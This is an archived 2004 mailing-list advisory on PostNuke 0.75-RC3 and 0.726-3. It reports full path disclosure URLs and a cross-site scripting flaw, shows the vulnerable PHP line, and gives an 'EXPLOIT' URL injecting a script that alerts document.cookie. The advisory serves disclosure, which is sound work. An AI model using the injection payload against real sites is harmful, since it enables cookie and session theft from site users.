lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1090145398.5806.200576755@webmail.messagingengine.com>
From: darkbicho at fastmail.fm (DarkBicho)
Subject: Multiple vulnerabilities PostNuke

Original Advisory: http://www.swp-zone.org/archivos/advisory-10.txt

-------------------------------------------------------------------------------------------------

                            :.: Multiple vulnerabilities PostNuke :.: 

  PROGRAM: PostNuke
  HOMEPAGE: http://www.postnuke.com/
  VERSION: 0.75-RC3, 0.726-3
  BUG: Multiple vulnerabilities
  DATE:  14/05/2004
  AUTHOR: DarkBicho
          web: http://www.darkbicho.tk
          team: Security Wari Proyects <www.swp-zone.org>
	  Perunderforce <www.perunderforce.tk>
          Email: darkbicho@...u.com
-------------------------------------------------------------------------------------------------

1.- Affected software description:
    -----------------------------

    Postnuke is a popular content management system, written in php.


2.- Vulnerabilities:
    ---------------


 A. Full path disclosure:

    This vulnerability would allow a remote user to determine the full
    path to the web root directory and other potentially sensitive
    information.

    http://localhost/html/modules/Xanthia/pnadmin.php

    Fatal error: Call to undefined function: pnmodgetvar() in 
    c:\appserv\www\html\modules\xanthia\pnadmin.php on line 53


    http://localhost/html/modules/Xanthia/pnuserapi.php

    Fatal error: Call to undefined function: pnmodgetvar() in
    c:\appserv\www\html\modules\xanthia\pnuserapi.php on line 49


 B. Cross-Site Scripting aka XSS:

    Error: function showcontent()

    :.: title :

    Line 986

    --------------------------------- code
    ------------------------------------------
  
    echo "<p><span
    class=\"pn-title\"><strong><em>".pnVarPrepForDisplay($title)."
    </em></strong></span><br />";
    echo "<p align=\"justify\"><span class=\"pn-normal\">";
    if ($cover != "")

    ----------------------------------------------------------------------------------
    

3.- EXPLOIT:
    ???????
    http://localhost/html/modules.php?op=modload&name=Reviews&file=index&req=showcontent
    &id=1&title=%253cscript>alert%2528document.cookie);%253c/script>
    

    Example:
    -------

    
    http://www.swp-zone.org/archivos/post-nuke.gif



4.- SOLUTION:
     ????????
    Vendors were contacted many weeks ago and plan to release a fixed
    version soon. 
    Check the PostNuke website for updates and official release details. 


5.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D 
    "EL PISCO ES Y SERA PERUANO"


5.- Contact
    -------

    WEB: http://www.darkbicho.tk
    EMAIL: darkbicho@...u.com
  
-------------------------------------------------------------------------------------------------
                                ___________      ____________ 
                               /   _____/  \    /  \______   \   
                               \_____  \\   \/\/   /|     ___/      
                              /        \\        / |    |        
                             /_______  / \__/\  /  |____|       
                             \/       \/        
                       
                                Security Wari Projects 
                                  (c) 2002 - 2004
		                    Made in Peru

----------------------------------------[   EOF   
]----------------------------------------------
?
??
??
DarkBicho  
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"

---------------------- The End ----------------------


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ